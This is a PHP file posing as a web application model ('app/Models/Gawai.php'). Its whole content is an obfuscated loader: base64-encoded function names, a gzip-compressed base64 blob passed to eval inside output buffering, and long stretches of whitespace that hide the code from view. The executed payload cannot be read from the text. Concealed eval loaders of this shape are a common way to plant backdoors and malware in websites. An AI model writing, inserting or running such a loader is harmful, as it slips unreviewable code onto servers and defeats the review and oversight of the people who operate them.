<?php 
        $__='printf';$_='Loading app/Models/Gawai.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
